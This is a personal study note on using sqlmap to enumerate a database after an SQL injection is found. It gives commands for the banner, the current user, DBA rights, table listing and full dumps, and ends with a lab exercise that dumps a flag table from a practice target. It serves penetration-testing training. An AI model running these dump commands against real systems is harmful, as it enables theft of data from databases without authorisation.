6 - DB Enum - JA Smith

- Enumeration represents the central part of an SQL injection attack, which is done right after the successful detection and confirmation of exploitability of the targeted SQLi vulnerability - It consists of lookup and retrieval (i.e., exfiltration) of all the available information from the vulnerable database # Basic DB Enum - After a successful detection of an SQLi vulnerability, we begin enumeration of basic db details - Database version banner (switch `--banner`) - Current user name (switch `--current-user`) - Current database name (switch `--current-db`) - Checking if the current user has DBA (administrator) rights (switch `--is-dba`) ```bash sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba ``` # Table Enum - After finding the current database name (e.g., `testdb`), the retrieval of table names would be by using the `--tables` option and specifying the DB name with `-D testdb` ```bash sqlmap -u "http://www.example.com/?id=1" --tables -D testdb ``` - After spotting the table name of interest, retrieval of its content can be done by using the `--dump` option and specifying the table name with `-T users` - Table is also dumped to a local file, where the path thereto is in console output ```bash sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb # -T to specufy table_name # -D to specific database_name ``` # Table/Row Enumeration - When dealing with large tables with many columns and/or rows, we can specify the columns (e.g., only `name` and `surname` columns) with the `-C` option ```bash sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname ``` - To narrow down the rows based on their ordinal number(s) inside the table, we can specify the rows with the `--start` and `--stop` options (e.g., start from 2nd up to 3rd entry) ```bash sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3 ``` # Full DB Enumeration - By simply using the switch `--dump` without specifying a table with `-T`, all of the current database content will be retrieved - As for the `--dump-all` switch, all the content from all the databases will be retrieved - It is advised to include the switch `--exclude-sysdbs` (e.g. `--dump-all --exclude-sysdbs`), which will instruct SQLMap to skip the retrieval of content from system databases # Exercise ## Case 1 - Detect and exploit SQLi vulnerability in GET parameter id - Basic enum of db details ```bash sqlmap -u 'http://94.237.121.111:33358/case1.php?id=1' --banner --current-user --current-db --is-dba ``` ![[images/Pasted image 20251209180435.png]] - Specify table and database names ```bash sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --dump -T flag1 -D testdb ``` ![[images/Pasted image 20251209180544.png]]